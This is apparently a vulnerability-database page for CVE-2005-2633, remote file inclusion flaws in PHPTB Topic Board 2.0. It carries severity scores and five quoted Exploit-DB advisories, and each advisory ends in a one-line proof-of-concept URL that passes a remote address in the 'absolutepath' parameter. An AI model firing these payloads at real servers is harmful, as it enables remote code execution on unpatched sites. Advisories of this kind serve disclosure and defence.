CVE-2005-2633
published 2005-08-23CVE-2005-2633: Multiple PHP file inclusion vulnerabilities in (1) admin_o.php, (2) board_o.php, (3) dev_o.php, (4) file_o.php or (5) tech_o.php in PHPTB Topic Board 2.0 and…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.90%
85.2th percentile
Multiple PHP file inclusion vulnerabilities in (1) admin_o.php, (2) board_o.php, (3) dev_o.php, (4) file_o.php or (5) tech_o.php in PHPTB Topic Board 2.0 and earlier allow remote attackers to execute arbitrary PHP code via the absolutepath parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phptb | topic_boards | <= 2.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHPTB Topic Board 2.0 - 'file_o.php?absolutepath' Remote File Inclusion
exploitdb·2005-08-17
CVE-2005-2633 PHPTB Topic Board 2.0 - 'file_o.php?absolutepath' Remote File Inclusion
PHPTB Topic Board 2.0 - 'file_o.php?absolutepath' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/14592/info
PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/classes/file_o.php?absolutepath=http://www.example.com/
Exploit-DB
PHPTB Topic Board 2.0 - 'board_o.php?absolutepath' Remote File Inclusion
exploitdb·2005-08-17
CVE-2005-2633 PHPTB Topic Board 2.0 - 'board_o.php?absolutepath' Remote File Inclusion
PHPTB Topic Board 2.0 - 'board_o.php?absolutepath' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/14592/info
PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/classes/board_o.php?absolutepath=http://www.example.com/
Exploit-DB
PHPTB Topic Board 2.0 - 'admin_o.php?absolutepath' Remote File Inclusion
exploitdb·2005-08-17
CVE-2005-2633 PHPTB Topic Board 2.0 - 'admin_o.php?absolutepath' Remote File Inclusion
PHPTB Topic Board 2.0 - 'admin_o.php?absolutepath' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/14592/info
PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/classes/admin_o.php?absolutepath=http://www.example.com/
Exploit-DB
PHPTB Topic Board 2.0 - 'tech_o.php?absolutepath' Remote File Inclusion
exploitdb·2005-08-17
CVE-2005-2633 PHPTB Topic Board 2.0 - 'tech_o.php?absolutepath' Remote File Inclusion
PHPTB Topic Board 2.0 - 'tech_o.php?absolutepath' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/14592/info
PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/classes/tech_o.php?absolutepath=http://www.example.com/
Exploit-DB
PHPTB Topic Board 2.0 - 'dev_o.php?absolutepath' Remote File Inclusion
exploitdb·2005-08-17
CVE-2005-2633 PHPTB Topic Board 2.0 - 'dev_o.php?absolutepath' Remote File Inclusion
PHPTB Topic Board 2.0 - 'dev_o.php?absolutepath' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/14592/info
PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/classes/dev_o.php?absolutepath=http://www.example.com/
No writeups or analysis indexed.
2005-08-23
Published